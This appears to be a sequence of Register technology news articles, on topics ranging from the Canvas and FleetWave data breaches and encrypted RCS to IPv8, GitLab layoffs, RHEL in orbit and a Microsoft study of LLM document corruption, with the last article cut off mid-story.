Windows update prompt joins the Post Office queue
BORK!BORK!BORK! "Let's cross this one off your list" are words to strike fear into the hearts of many a Windows user, particularly when they appear on some Post Office digital signage. Spotted by an eagle-eyed Register reader in East Dulwich, London, the screen is one of two public displays designed to entertain and inform customers waiting to be ignored by a member of staff. The Post Office is a place where objects can be sent and forms completed or collected. It is normally identifiable by a queue of depressed citizens snaking toward (and sometimes beyond) the door, and an impressive ability to have not quite enough staff to ensure all available positions are open. Here, Windows is thankfully relegated to serving up information rather than the all-important task of announcing available counters. The English may be patient queuers, but even they would baulk at a mechanical voice declaring "IRQL_NOT_LESS_OR_EQUAL", followed by the news that Windows needed to dump its memory before service could resume. That said, using Microsoft's finest to run an information screen does seem overkill. "I've always been amazed that a full-fat OS is used on a system that only has to perform a trivial function," our reader noted, and we'd have to agree, particularly when Windows, in this instance, doesn't even seem able to do that right. The message, in theory, is helpful. Windows needs an update and is politely asking when a good time would be. The problem is that, without a keyboard and mouse available, nobody in the queue can help. And, frankly, Windows shouldn't need to ask. Considering the opening times of the average Post Office, there is plenty of time when the doors are locked, and there are no punters on hand to witness the operating system giving itself a jolly good update, with a cheeky reboot or two to finish the job. ®
Apple, Google drag cross-platform texting into the encrypted age
Apple and Google have taken a big step toward securing cross-platform texting, ending years of messages bouncing around in glorified plaintext. Apple announced this week that encrypted Rich Communication Services (RCS) messaging is rolling out in beta for iPhone users running iOS 26.5 and Android users on the latest version of Google Messages. The feature works across supported carriers and adds end-to-end encryption to cross-platform chats that were still taking the scenic route through carrier-era messaging infrastructure. Users will know it's enabled when a lock icon appears in RCS conversations. Apple says E2EE RCS messages cannot be read while traveling between devices, bringing Android-to-iPhone chats closer to the protections offered by WhatsApp and Signal. The move lands as other platforms head in the opposite direction. Earlier this month, Meta confirmed it was backing away from parts of its encryption rollout for Instagram DMs, telling The Register that "very few" people actually used the feature and suggesting privacy-minded users head over to WhatsApp instead. Apple, meanwhile, appears content to lean harder into the privacy angle, finally plugging one of the more obvious holes in modern messaging security. That gap has been hanging around for years. While iMessage chats between Apple devices were already encrypted, conversations involving Android phones could fall back to SMS or unencrypted RCS, depending on carrier support. Google had offered encrypted RCS chats inside Google Messages for years, but only when both sides used Google's ecosystem. Apple joining the party means cross-platform RCS encryption is finally starting to span the two largest mobile ecosystems. The rollout is still marked as beta, and carrier support varies by region, so not everyone will get encrypted chats immediately. UK availability remains unclear for now, as none of the major UK networks currently appear on Apple's published compatibility lists for the feature. Still, after two decades of the mobile industry insisting that interoperability and security could not coexist, cross-platform texting may finally be catching up with the rest of modern messaging. ®
ZTE and Claro launch next-generation 4K Ultra HD IP STB in Brazil
Partner Content ZTE Corporation and Claro have introduced a new generation of 4K Ultra HD IP set-top box (STB) in Brazil – bringing together stunning Ultra HD visuals, intelligent voice control, fast connectivity, and rich content into one seamless experience. Against the backdrop of the sustained rapid development of Brazil's digital TV and streaming media business, user requirements for video quality, interactive experience, and network performance continue to rise. ZTE, together with Claro, officially launched the new-generation 4K Ultra HD IP STB Z4KW6, bringing “Ultra HD + Intelligent Voice + High-Speed Connectivity + Massive Content” comprehensively to Brazilian households and driving a further upgrade of the digital entertainment experience. Built for the next era of digital TV and streaming, it delivers sharper picture quality and effortless hands-free interaction with far-field voice, making everything feel faster, smoother, and more intuitive. With enhanced connectivity, streaming stays smooth – even in peak usage hours of multi-device homes. And with a rich content ecosystem, all entertainment comes together in one place. Designed for simplicity and built for performance, the Z4KW6 sets a new benchmark for home entertainment. This launch marks a new step forward for home entertainment in Brazil – smarter, faster, and more immersive than ever.
FleetWave outage takes another turn. Chevin confirms crooks accessed customer data
A month after Chevin Fleet Solutions declared its FleetWave outage contained and systems restored, the company has now admitted that attackers accessed customer databases and potentially acquired operational and personal data. Chevin confirmed the breach in an email to customers, seen by The Register, marking the first time it has acknowledged that data was accessed during the April incident that knocked parts of its web-based software offline across the UK and US. At the time, Chevin said it had pulled parts of its Azure-hosted FleetWave tool offline while outside cybersecurity specialists investigated. Status pages showed a "major outage" across the UK and US, but beyond that, customers got little detail on what had happened or whether any data had been caught up in it. Now it turns out that at least some customer databases were indeed affected by the breach. According to the email, Chevin’s forensic investigation determined that an "unauthorized third-party accessed and potentially acquired certain data" from customer databases backed up on April 3, 2026. The exposed information varies depending on how customers configured FleetWave, but includes operational fleet management data alongside personal information such as names, contact details, and payroll numbers. It’s unclear how many individuals and organizations have been affected. The Register’s asked for comment and a spokesperson told us: "Chevin recently experienced a cybersecurity incident affecting certain systems. We immediately took steps to contain the incident, engaged with law enforcement and external cybersecurity experts, and have since restored impacted services. "Following consultation with external cybersecurity forensic experts, we are confident our systems have been secured. Our customers are our top priority, and we are working directly with those impacted." The company insists that the stolen information does not generally include any of the higher-risk categories under GDPR, such as financial information, payment card details, passport data, or special category data. Chevin also claims in its email to customers that it has taken steps to stop the information from being "published, sold, or misused," and says ongoing dark web monitoring has not identified evidence of the data circulating online. One Chevin customer told The Register their organization was unlikely to have been the intended ransomware target due to its size, suggesting the breach may have been aimed elsewhere. The customer also questioned why Chevin appeared confident enough to restore systems and close out forensic work before later returning with confirmation that data had in fact been accessed. The customer said the mention of payroll numbers came as a surprise because their company does not use FleetWave for payroll data, raising questions about how tailored the notification really was. Chevin is now offering affected customers a one-time download of their SQL database and a spreadsheet summarizing potentially exposed records through a secure portal. In the email, signed by CEO Gary Thompson, Chevin says it is "confident that the incident has been contained" and FleetWave systems are now "safe and secure for customers." ®
Britain pays Starlink millions despite Musk's calls to overthrow UK government
Britain's Ministry of Defence (MoD) has clocked up a £16.6 million ($22.6 million) bill with Starlink over the past four years, despite SpaceX CEO Elon Musk expressing a desire to overthrow the UK government. Data released by the MoD shows that Britain has continued to pay for access to the spaceborne data network, primarily to help support the Ukrainian military in its ongoing battle against the Russian invasion. Not all of the expenditure is accounted for by Ukraine, however. Some goes toward providing British military personnel serving overseas with a vital link home. According to Business Matters, upward of 50,000 Starlink terminals have been sent to Ukraine since the start of the war in 2022. Initially, the cost of helping that nation's frontline communications was borne by Starlink itself, with some grumbling from Musk, who controls the company's parent business, SpaceX. However, a year later the satellite operator clinched an official US government contract covering the Starlink service for Ukraine, which we understand is still funded by the Department of Defense (DoD), although President Trump has not sought congressional approval for any new funding for US military assistance to Ukraine since returning to office. The UK appears to be footing part of the Starlink bill. The MoD acknowledged the figure, with some spending understood to cover terminals gifted to Ukraine, including their purchase and airtime. However, the MoD seems keen to emphasize that Starlink is not being used for any kind of military purposes by British forces. "Starlink technology is not used for military operations and is primarily used by our hardworking personnel to stay connected with their loved ones when they're in areas without regular internet access, for example on a warship," a spokesperson told The Register. "As the public would rightly expect, all spending is rigorously checked to ensure it delivers value for taxpayers' money and spend on Starlink has significantly reduced in the last year." Ukraine uses Starlink for battlefield communications and remote control of drones. The sum is modest in relation to the entire UK defense budget, on track to hit £62.2 billion ($85 billion) for FY 2025/26. It is also likely just covering a small part of the Ukrainian service costs, as Starlink was asking for $400 million per year to cover these at one point. Some Brits may feel uncomfortable paying a man who has openly called for the overthrow of the British government. Earlier this year, Musk publicly mused whether the US should "liberate the people of Britain from their tyrannical government." No, it wasn't on April 1. ®
Japan’s PM orders cybersecurity review to stop Mythos going full CyberZilla
Japan’s prime minister Sanae Takaichi has ordered a review of government cybersecurity strategy, citing the arrival of Anthropic’s bug-hunting model Mythos as a moment that warrants a cabinet-level project. In a Tuesday cabinet meeting, the PM instructed cybersecurity minister Hisashi Matsumoto to devise measures to check the state of government systems to determine whether it’s possible to detect and fix vulnerabilities, and to develop a plan to ensure critical infrastructure operators can do likewise. Japan’s leader ordered the checks because she feels Mythos and similar frontier models may be misused, and that attacks on infrastructure may therefore increase in speed and scale – perhaps even exponentially. Over the last couple of years cybersecurity vendors and researchers have often pointed out that AI models make it possible to find flaws and automate attacks. When Anthropic debuted Mythos in early April, the notion that AI has the potential to vastly complicate the security landscape went mainstream. Many regulators around the world have issued guidance to point out that now is the perfect time to revisit and improve security strategies and capabilities, because Mythos and other AI models mean defenses are going to be tested like never before. India’s securities regulator went a step further by ordering a security review at the organizations it oversees. And now Japan’s leader has decided the matter is of sufficient importance that her office needs to weigh in and set new policy to ensure AI doesn’t go on a destructive rampage through Japanese infrastructure. Whether Takaichi’s urgency is needed is open to debate. Some researchers have said that while Mythos can find bugs at speed, it doesn’t find flaws humans can’t detect with their naked brains. Others suggest Mythos is not vastly better at finding bugs than open source models that pre-date it and are publicly available – unlike Mythos, which is restricted to certain users. Still others have all but dismissed Mythos as a marketing stunt. ®
Veteran network architect proposes IPv8 – to improve IPv4, not leapfrog v6
A veteran network architect named James Thain has drafted a proposal for “Internet Protocol Version 8” (IPv8) and hopes to crowdfund work to create a testbed that will demonstrate his ideas. Thain’s proposal appeared as an Internet Engineering Task Force (IETF) Internet-Draft on April 16th. Like all such documents, it has no official standing – the multistakeholder systems under which the internet is governed allow open participation and this is Thain’s contribution. The draft opens with a bold vision for IPv8, describing it as “a managed network protocol suite that transforms how networks of every scale – from home networks to the global internet – are operated, secured, and monitored.” On the IPv8 website he describes it as “a managed network protocol suite that resolves IPv4 exhaustion, unifies network management, and stays 100 percent backward compatible — no flag day, no forced migration.” The draft also describes IPv4 as “a proper subset of IPv8. An IPv8 address with the routing prefix field set to zero is an IPv4 address. No existing device, application, or network requires modification.” In conversation with The Register, Thain said he created the IPv8 draft because existing protocols were developed for the networking problems of the day, and things have now well and truly moved on. He also thinks that few organizations other than hyperscalers and network operators have a good reason to adopt IPv6, because it doesn’t offer major improvements over IPv4 and migrations to the newer protocol seldom produce return on investment. He allows that IPv4 exhaustion means many organizations and network operators do need to consider IPv6 but feels the best course of action is to improve IPv4 so users get a better protocol without the need for upgrades. One improvement in IPv8 expands the IPv4 numberspace by adding what he calls an “area code” based on a network operator’s autonomous system number (ASN), the unique identifiers assigned to networks by regional internet registries. ASNs effectively function as addresses for a network, to inform routing decisions. IPv8 proposes an address format r.r.r.r.n.n.n.n where the “r” is the ASN encoded as a 32-bit integer and the “n” is a conventional IPv4 address. This scheme means every ASN holder gets 2^32 host addresses – 4,294,967,296 addresses apiece. Thain thinks that will suffice for almost every organization, and those who need more probably already operate multiple ASNs. His scheme would see the IPv4 numberspace expand to around 30 trillion (3 x 10^13) unique addresses. That’s well short of the 340 undecillion (3.4 x 10^38) addresses available under IPv6, but Thain thinks it’s still enough and that users will appreciate not having to migrate away from IPv4. “It doesn’t require a ton of changes to Border Gateway Protocol which already knows how to route multiple protocols,” Thain told us. “So does MPLS.” IPv8 therefore “gives you a roll forward of IPv4, you just need servers to translate the ‘area codes’. The rest of the stack is all well-known,” Thain said.
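To make the “area code” idea concrete, here is a minimal sketch – our own illustration, not anything specified in Thain's draft – assuming the 32-bit ASN is simply rendered as a second dotted quad in front of the conventional IPv4 address:

```python
# Hypothetical rendering of the draft's r.r.r.r.n.n.n.n format.
# The function name and formatting are our own, not from the Internet-Draft.
import ipaddress

def ipv8_address(asn: int, ipv4: str) -> str:
    """Prefix an IPv4 address with an ASN 'area code' as r.r.r.r.n.n.n.n."""
    if not 0 <= asn < 2**32:
        raise ValueError("ASN must fit in 32 bits")
    area = ipaddress.IPv4Address(asn)  # reuse dotted-quad rendering for the 32-bit ASN
    return f"{area}.{ipaddress.IPv4Address(ipv4)}"

# A routing prefix of zero means a plain IPv4 address, per the draft's
# backward-compatibility claim
print(ipv8_address(0, "192.0.2.1"))     # 0.0.0.0.192.0.2.1
print(ipv8_address(64512, "10.0.0.1"))  # 0.0.252.0.10.0.0.1
```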
“There is no magic here, it is just an area code plus IPv4.” Another IPv8 feature is what Thain calls a “Zone server” that his draft explains “runs every service a network segment requires: address assignment (DHCP8), name resolution (DNS8), time synchronisation (NTP8), telemetry collection (NetLog8), authentication caching (OAuth8), route validation (WHOIS8 resolver), access control enforcement (ACL8), and IPv4/IPv8 translation (XLATE8).” IPv8 has caused a stir in internetworking circles, and drawn some at-times bitter criticism. Others have been more nuanced. Silvan Gephart of ISP Openfactory blogged about the draft and said “I like that there is a proposal thinking about the routing table, addressing, management, authentication and operational complexity as one bigger problem.” Some of the criticism levelled at the protocol suggests it’s the work of AI. Thain doesn’t shy away from having used chatbots to work on his draft and told The Register he feels doing so is contemporary practice. He thinks he can prove the naysayers wrong by building an IPv8 testbed and has commenced a crowdfunding campaign that aims to raise $100,000 to cover the cost of developing open-source software, research and testing infrastructure, plus demos and documentation. You can find the crowdfunding project here. ®
GitLab promises a different kind of layoff as biz pivots toward AI
GitLab has opened the voluntary separation window and hopes an unspecified number of employees will exit the business to help it become "the trusted enterprise platform for software creation in the AI era." According to CEO Bill Staples, the company's effort to trim its workforce differs from other AI-related layoffs. "This restructure process is not like others you may be seeing in the news," wrote Staples in a blog post. "Of course AI is changing the way we work and is part of our transformation plan, but this is not an AI optimization or cost cutting exercise." What is it then? Well, according to Staples, GitLab plans to use most of the money it saves by sacking staff to invest in its business. We note that the five fundamental architectural bets at the heart of this business reorientation – agent-specific APIs; reworked CI/CD; a data model for surfacing context; governance; and support for human-owned, agent-assisted, and autonomous workloads – sound like infrastructure investments, the very thing other companies fuel with vacated payroll obligations. But GitLab isn't (so far as we can tell) returning freed funds to investors, initiating a stock buyback, larding executive bonuses, or launching an ill-advised metaverse venture that will consume $80 billion over five years. So maybe that's the difference to which Staples alluded. The other difference Staples cited is his company's plan to have managers chat with employees about staying or going. "Starting today, managers across the company are entering deeper conversations with leadership about how the restructuring principles land inside their teams," he said. "Those conversations will inform the decision of impacted roles." There's no word on the rubric for these retention-or-departure chats. Presumably employees deemed insufficiently enthused about the new direction will be encouraged to exit through the voluntary separation window. Absent that cooperation, defenestration at the hands of managers will likely follow. While Staples has not provided a target for the number of desired layoffs – details will be revealed during the company's Q1 FY2027 financial report on June 2nd – he did set a territory footprint goal. "We're reevaluating our operational footprint, and are planning to reduce the number of countries by up to 30 percent where we have small teams," he said. GitLab currently operates in 60 countries. That's a lot of different corporate entities to run, tax laws to master, and offices to rent. The code biz did not immediately respond to a request to clarify how "small teams" is defined. Nor does it disclose its headcount in recent annual reports. According to analytics biz Unify, GitLab has about 1,800 employees, of whom almost 1,500 work outside the US. Another goal of the layoff plan is to reduce GitLab's organizational layers. "We’re flattening our organization because eight layers is too deep for a company our size and management layers are slowing us down," said Staples. GitLab is betting heavily on its Duo Agent Platform (DAP), which entered general availability in January. As recently as its 2025 annual report [PDF], GitLab talked up the possibility of continued hiring. "We intend to grow our international revenue by strategically increasing our investments in international sales and marketing operations, including headcount in the EMEA and APAC regions," the biz said during a more optimistic time. Now, not so much.
Beyond other challenges like soft government business, one reason for the AI remake appears to be the company's decision to raise prices back in 2023. In March, during GitLab's Q4 FY2026 [PDF] conference call for investors, Staples admitted that price-sensitive organizations didn't much appreciate having to pay more. "Our 50 percent Premium price increase a few years ago also coincided with rising AI code experimentation and flattish SaaS budgets," he said. "Simultaneously, our upmarket shift reduced technical resources at the lower end of the market. Together, these have slowed Premium growth, particularly among price-sensitive customers which we estimate at roughly 20 percent of our ARR, including the SMB weakness that we have been discussing recently." ®
Red Hat blasts RHEL 10.1 into orbit aboard Voyager's micro datacenter
Red Hat Enterprise Linux 10.1 has powered up on board a datacenter orbiting 250 miles or about 400 km above the Earth. That RHEL-powered satellite is Voyager’s LEOcloud Space Edge “micro” datacenter, which launched aboard a SpaceX Falcon 9 rocket and hitched a ride on the International Space Station (ISS) back in September. The system is designed to demonstrate the advantages of processing data gathered directly in orbit, rather than sending info back to a conventional terrestrial datacenter. Voyager boasts the reduction in latency makes the system as much as 30x faster than sending all the data back to Earth. Originally developed by LEOcloud prior to its acquisition by Voyager last year, Space Edge is, as its name suggests, a low-power edge compute platform for orbital data processing. Voyager and Red Hat contend that “as commercial and government organizations increase their reliance on space-based data, the ability to process data in orbit is increasingly critical.” And they certainly wouldn’t be the first to suggest that. Faced with power constraints, SpaceX, Amazon, Google, Nvidia and others have all announced plans to put large clusters of AI datacenters in orbit, with some designs aiming to cram 100kW worth of compute onboard a single satellite. The company hasn’t disclosed the hardware used in Voyager’s Space Edge, stating only that it’s a “space-hardened managed cloud infrastructure.” Hardening is certainly a concern for complex electronics operating outside Earth’s atmosphere, where charged particles and radiation can corrupt data or do permanent damage over time. HPE’s Spaceborne compute platform demonstrated many of these challenges during its first mission aboard the ISS in 2017. Over the course of its mission the system, which was composed of mostly off-the-shelf components, suffered several upsets including a power failure and SSDs that failed at an “alarming rate,” HPE's Mark Fernandez said at the time. We’ve reached out to Voyager for comment on the system and what kind of data its “micro” datacenter will process during its mission. We’ll let you know if we hear anything back. It’s safe to assume Space Edge’s compute capacity is limited, as promotional images show its systems are little larger than a shoebox - and therefore offer less room for components than servers used on Earth. What we do know is that RHEL 10.1, along with Red Hat’s Universal Base Image (UBI), are up and running on the ISS. Specifically, Space Edge is running RHEL in image mode, an immutable build of the OS where changes to most directories will reset to a known good state upon reboot. This means that any issues related to what they call "configuration drift" can be addressed by turning the machine off and back on again, a feature we’re sure will be popular among many in the IT crowd. Alongside the base OS, Space Edge is also running Red Hat’s UBI container image under Podman, a container engine similar to Docker that is rootless and daemonless by default. RHEL 10.1’s arrival in orbit comes amid renewed interest in space driven by the yearning of every great hyperscaler to boldly go and generate tokens where no one has before. Actually, they have, but not at scale. But that’s exactly what SpaceX, Amazon and others have proposed. In pursuit of unlimited power, the two companies have independently filed to put large constellations of AI satellite compute platforms in sun-synchronous orbit.
In February, SpaceX filed an application with the Federal Communications Commission to lob a million space-based datacenters into orbit. Meanwhile, Amazon has proposed a slightly smaller constellation with 51,600 data processing satellites. Of course, these plans do have one small problem left to solve. How will they get those sats into orbit for less than the cost of simply building more terrestrial infrastructure? According to one space datacenter startup, the economics of orbital datacenters won’t be viable until the cost to orbit falls to around $10 per kilogram. As of writing, a rideshare aboard a Falcon 9 runs about $7,000 a kilogram. ®
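For a sense of the gap, here's a quick back-of-the-envelope calculation using the figures above – the one-tonne satellite mass is a made-up assumption purely for illustration:

```python
# Launch economics from the numbers in the story; the satellite mass is hypothetical.
RIDESHARE_NOW = 7_000   # $/kg aboard a Falcon 9 rideshare today
VIABLE_TARGET = 10      # $/kg threshold cited by one space-datacenter startup

sat_mass_kg = 1_000     # assumed mass of a single compute satellite
print(f"launch cost today:  ${sat_mass_kg * RIDESHARE_NOW:,}")  # $7,000,000
print(f"launch cost target: ${sat_mass_kg * VIABLE_TARGET:,}")  # $10,000
print(f"prices must fall ~{RIDESHARE_NOW // VIABLE_TARGET}x")   # ~700x
```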
Securing the Untrusted Agentic Development Layer
Join us to learn how to architect a development environment where your builders and their agents can move fast and securely.
Quit VMware and you’ll emerge with more complex and less capable infrastructure
Organizations that decide to reduce their VMware footprints, or quit Virtzilla entirely, will emerge with more complex and less capable infrastructure. That’s the view of Paul Delory, a research vice president with analyst firm Gartner, who yesterday told the company’s IT Infrastructure, Operations & Cloud Strategies Conference in Sydney that there is no technical reason for VMware users to adopt a rival hypervisor, and that no vendor offers a one-for-one replacement for the virtualization pioneer’s flagship Cloud Foundation (VCF) suite. But Delory said Broadcom’s licensing policies, which see it only sell VCF, mean VMware users’ licensing bills typically rise by 300 to 400 percent. Broadcom argues that the full-stack private clouds VCF makes it possible to build are so efficient that VCF quickly pays for itself. The analyst told the conference he thinks those contemplating a move off VMware will do better if they instead focus on application modernization. But he said Broadcom’s price changes, and the prospect the company might hike prices again in future, mean many VMware users will look elsewhere. Those who do, he warned, will end up with more complex infrastructure for two reasons. One is that few organizations will be able to quit VMware entirely, as they run applications with dependencies that aren’t easy or economical to unwind. Reducing or eliminating a VMware rig therefore means adopting multiple replacements, which creates more infrastructure to manage and therefore extra complexity. The other is that no rival hypervisor can match the efficiency or VM density possible when using VMware’s products, so moving means acquiring more hardware. Delory said the best alternatives to VMware are the public cloud, or HCI vendors – these days that acronym denotes both hyperconverged infrastructure and hybrid cloud infrastructure. The analyst warned that HCI vendors, with the exception of Nutanix, have weak migration tools that will leave users needing to create bespoke migration automations using “Ansible and a Rube Goldberg machine.” Public clouds, he said, will welcome customers who move 1,000 or more VMs with free migration services. He recommended against considering OpenStack, which he said remains “too big, too complex, and has too many moving parts for the typical IT shop to handle effectively.” Delory also warned VMware users that migration projects are significant engineering undertakings that require extensive assessment of every application in a fleet to determine its best destination, and the work required to get it there. He reminded VMware users that not every workload is certified to run under non-VMware hypervisors, and that some vendors now offer cloud-native versions of their wares and therefore offer an easier on-ramp to containerised applications. Delory advised exploring those options, and not making architectural decisions that mean you can’t consider moving off VMware. “VMware is betting that you can’t move off and they can jack the price way up,” he said. “That may be a good bet. But don’t make it easy.” The analyst finished his talk by predicting most users will minimize their VMware footprints, rather than eliminating them, and restated Gartner’s prediction that 35 percent of workloads currently running under VMware will operate on a different platform by 2028. ®
Double Canvas breach acknowledged as ShinyHunters sets new pay-or-leak deadline
Ed-tech giant Instructure confirmed two rounds of unauthorized activity affecting its online learning platform Canvas within two weeks as data-theft-and-extortion crew ShinyHunters threatened to leak data it claims belongs to more than 275 million students, teachers, and staff tied to nearly 9,000 schools worldwide. In a security incident update, Instructure apologized for the disruption when Canvas went offline last Thursday, leaving thousands of colleges, universities, and K-12 schools without access to course materials, grades, and due dates during final exams and, for many, Advanced Placement testing. As of Saturday, the parent company claimed, “Canvas is fully back online and available for use.” And it finally broke its silence on Monday about what happened, admitting not one but two intrusions after criminals exploited a security vulnerability in its Free-for-Teacher learning system, and saying the data thieves stole information including usernames, email addresses, course names, enrollment information, and messages. “Core learning data (course content, submissions, credentials) was not compromised,” the Monday disclosure said. “We're still validating all findings, but we want to be clear about what we understand was and wasn't affected.” On April 29, the online education firm “detected unauthorized activity in Canvas,” immediately revoked the intruder’s access, and initiated a probe into the breach, according to Instructure’s notice posted on its website. On May 7, the company “identified additional unauthorized activity tied to the same incident.” ShinyHunters defaced about 330 Canvas school login portals, also exploiting the same Free-for-Teacher vulnerability, and that caused the ed-tech firm to take Canvas offline and “into maintenance mode to contain the activity.” ShinyHunters claims it stole 3.65 TB of data, including about 275 million records from about 8,800 schools, among them Harvard, Columbia, Rutgers, Georgetown, and Stanford universities. After moving the pay-or-leak deadline multiple times, ShinyHunters set a final deadline of end-of-day May 12 for individual institutions to contact them directly to negotiate payment - or the group will publish the full dataset. In response, Instructure said it temporarily shut down its Free-for-Teacher accounts. It also revoked privileged credentials and access tokens tied to compromised systems, rotated internal keys, restricted token creation pathways, and added monitoring across all platforms. The education platform hired CrowdStrike to assist with its forensic analysis and incident response, and said it also notified the FBI - which published its own alert on social media - and the US Cybersecurity and Infrastructure Security Agency. This is Instructure’s second breach in less than a year. ShinyHunters claimed to have breached Instructure's Salesforce environment in September 2025, and while Instructure didn’t name the crew in its latest disclosure, it did address the intrusion. “The prior Salesforce-related incident and this Canvas security incident are distinct events involving different systems and circumstances,” the company said. ®
Rodent-obsessed developer creates Ratty to bring 3D graphics to the command line
When you think of a terminal emulator, you imagine a command line interface filled with ASCII text and a prompt. However, one developer has reimagined the experience to include inline 3D objects and image support. Dubbed Ratty by its creator Orhun Parmaksiz for its 3D spinning rat cursor, the emulator treats the terminal window itself as a 3D canvas that supports sprites and 3D models, renders 3D drawings in real time, and even includes its own graphics protocol. “Terminal emulators are a big part of our daily lives as developers but yet we are not making enough innovations in that space,” Parmaksiz told The Register in an email. “With Ratty I hope to inspire others to experiment with terminals and push the limits of what they can do.” Parmaksiz wrote in his blog post introducing Ratty that he accomplished the whole thing using his own Rust terminal interface library, Ratatui, along with the Bevy game engine, also built with Rust. The aforementioned Ratty Graphics Protocol was created to register 3D assets and place them in an anchored terminal cell space. “Ratty separates terminal emulation from presentation: one side handles PTY I/O and terminal parsing, while the other turns the result into a GPU-rendered 2D or 3D scene,” Parmaksiz explained. “This allows for a lot of flexibility in how the terminal output is displayed (e.g. you can warp the whole damn thing).” Ratatui ends up serving as the terminal rendering layer, Parmaksiz explained, taking whatever the terminal state is, rebuilding it in its own buffer, and rendering said buffer onto a texture that is then rendered via Bevy. Given its design, be forewarned if you try to install and run Ratty: It’s going to eat up a lot of memory since it’s running a game engine. “I know, sacrificing 300 MB of RAM just to run a terminal emulator is a lot,” Parmaksiz said. “But everything comes with a cost, especially the spinning rat cursor.”
Building the fourth temple
Parmaksiz’s desire to push terminal emulators past their logical limits didn’t come from nowhere - he actually got inspiration from a source that some grey-hairs in the tech community might have been reminded of at the very beginning of this story: TempleOS. For those unfamiliar with TempleOS, it’s an operating system that was developed by the late Terry Davis, a schizophrenic, and arguably genius, software developer who believed he was building the OS at the command of God to serve as a digital Jewish Third Temple. Using TempleOS is an exercise in frustration given its confusing interface, not to mention deliberate constraints (Davis believed its 640x480 desktop, 16-color display, single-voice audio and other features were part of God’s commandment), but it also included a fascinating capability not seen in other OSes: first-class, insertable sprites on the command line. “I was blown away by the creativity and passion behind it,” Parmaksiz told us of TempleOS, noting that 3D command line sprites in the OS were his inspiration for Ratty. “I wanted to see how adopting that to a modern-day terminal emulator would look like and experimented with a couple of other things while I was at it. I'm super happy with the result!” Parmaksiz told us that a number of people instantly caught on to the TempleOS inspiration, and that the feedback has been overwhelmingly positive. That said, he also admitted that most people who’ve used it have been scratching their heads over an actual use case. “I think this will also clarify itself if we give it more time,” Parmaksiz said in his email.
“I mean... I really would like to see a full-fledged CAD program in the terminal built with Ratty Graphical Protocol at some point!” Whether that’ll ever happen remains to be seen - this is purely a fun project for now, and Parmaksiz isn’t even sure his personal time budget allows him to continue maintaining it. “I'm just testing the waters for now, but the reception has been amazing so far. I would be happy to continue development if people start using Ratty and start developing cool things with it,” Parmaksiz said, noting that the code is open and he’d be thrilled if others contributed. Parmaksiz has developed a Ratatui widget that enables devs to build applications that run in Ratty, like a temple runner knockoff. “My ultimate goal with Ratty is to explore the possibilities of what a terminal can be and inspire new ideas and projects in the terminal space,” Parmaksiz wrote in his blog post. “I believe these kinds of experiments are where creativity is born and I hope to spark some ideas for the future of terminals.” ®
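The Ratty Graphics Protocol itself isn't documented in detail here, but protocols of this kind typically ride on terminal escape sequences. Purely as a hypothetical sketch – every command name and field below is invented, not taken from Ratty – registering an asset and anchoring it to a terminal cell might look something like this:

```python
# Invented illustration of an escape-sequence graphics protocol; the real
# Ratty Graphics Protocol may differ entirely.
import base64
import sys

def place_asset(asset_id: int, row: int, col: int, payload: bytes) -> None:
    """Send a (made-up) APC escape that anchors an asset to a terminal cell."""
    b64 = base64.b64encode(payload).decode("ascii")
    # APC framing (ESC _ ... ESC \) is what several real terminal graphics
    # protocols use to smuggle binary data past the text stream
    sys.stdout.write(f"\x1b_Rid={asset_id};row={row};col={col};{b64}\x1b\\")
    sys.stdout.flush()

place_asset(1, row=5, col=10, payload=b"<3d-model-bytes>")
```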
Microsoft researchers find AI models and agents can't handle long-running tasks
Companies exploring automated workflows would be well advised to keep their AI agents on a short leash. Microsoft researchers have found that even the priciest frontier models introduce errors in long workflows, the very thing for which AI software has been pitched. Anthropic, for example, says, "Claude Cowork handles tasks autonomously. Give it a goal and Claude works on your computer, local files, and applications to return a finished deliverable." Redmond promotes similar usage, touting Microsoft 365 Copilot's ability to "Tackle complex, multistep research across your work data and the web." The Windows maker's scientists aren't so sure about that. Philippe Laban, Tobias Schnabel, and Jennifer Neville from Microsoft Research set out to study what happens when large language models (LLMs) are asked to complete multistep tasks. They recently published their findings in a preprint paper with a spoiler title: "LLMs Corrupt Your Documents When You Delegate." To test how LLMs handle long-running knowledge work tasks, the researchers devised a benchmark called DELEGATE-52. It simulates multistep workflows across 52 professional domains, such as writing code, crystallography, and music notation. It is a more taxing test than sorting a spreadsheet, a task that should be table stakes for any aspiring workflow agent. In the accounting domain, for example, the challenge involves a seed document that represents the accounting ledger of Hack Club, a nonprofit organization. The model is asked to split the seed document into separate category-based files and then to merge these chronologically back into a single file. "Our findings show that current LLMs introduce substantial errors when editing work documents, with frontier models (Gemini 3.1 Pro, Claude 4.6 Opus, and GPT 5.4) losing on average 25 percent of document content over 20 delegated interactions, and an average degradation across all models of 50 percent," the authors report. The authors found that LLMs did better on programming tasks and worse on natural language tasks. To be considered "ready" for a given work domain, the researchers set the bar at 98 percent or higher after 20 interactions. They only found one domain qualified: Python programming. For every other domain, the authors found LLMs fell short of "ready." "A per-domain breakdown of end-of-simulation scores reveals that models are not ready for delegated workflows in the vast majority of domains, with models severely corrupting documents (at least -20 percent degradation) in 80 percent of our simulated conditions," the authors state. The study found that "catastrophic corruption," meaning a benchmark score of 80 percent or less, occurred in more than 80 percent of model/domain combinations. The best performing model, Google Gemini 3.1 Pro, was ready for only 11 of 52 domains. In weaker models, degradation took the form of content deletion; in frontier models, it took the form of content corruption. And when errors occurred, they tended to happen all at once, resulting in the loss of 10 to 30 points in a single round-trip interaction, rather than accumulating over the entire test run. "The stronger models (Gemini 3.1 Pro, Claude 4.6, GPT 5.4) aren’t avoiding small errors better, they delay critical failures to later rounds and experience them in fewer interactions," the researchers observe in their paper. The Microsoft authors went on to test how agents – LLMs given access to file reading, writing, and code execution through a basic harness – handle the DELEGATE-52 benchmark. 
